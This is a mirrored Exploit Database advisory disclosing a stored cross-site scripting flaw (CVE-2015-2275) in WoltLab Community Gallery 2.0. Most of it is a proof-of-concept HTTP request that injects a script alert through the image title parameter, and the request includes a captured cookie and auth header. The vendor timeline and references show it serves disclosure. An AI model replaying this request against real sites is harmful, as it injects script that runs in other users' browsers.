WoltLab Community Gallery – Persistent Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： ITAS Team
  日期： 2015-03-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36368/

• #Vulnerability title: Community Gallery - Stored Cross-Site Scripting
  vulnerability
  #Product: Community Gallery
  #Vendor: https://www.woltlab.com
  #Affected version: Community Gallery 2.0 before 12/10/2014
  #Download link:
  https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
  #Fixed version: Community Gallery 2.0 after 12/26/2014
  #CVE ID: CVE-2015-2275
  #Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn [email concealed]) & ITAS Team (www.itas.vn)
  
  ::PROOF OF CONCEPT::
  
  + REQUEST:
  POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
  Host: target
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
  Content-Length: 1300
  Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
  Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
  Connection: keep-alive
  Pragma: no-cache
  Cache-Control: no-cache
  
  actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1
  
  - Vulnerable parameter: parameters[data][7][title]
  
  ::DISCLOSURE::
  + 12/10/2014: Detect vulnerability
  + 12/10/2014: Send the detail vulnerability to vendor
  + 03/11/2015: Public information
  
  ::REFERENCE::
  - http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
  - https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275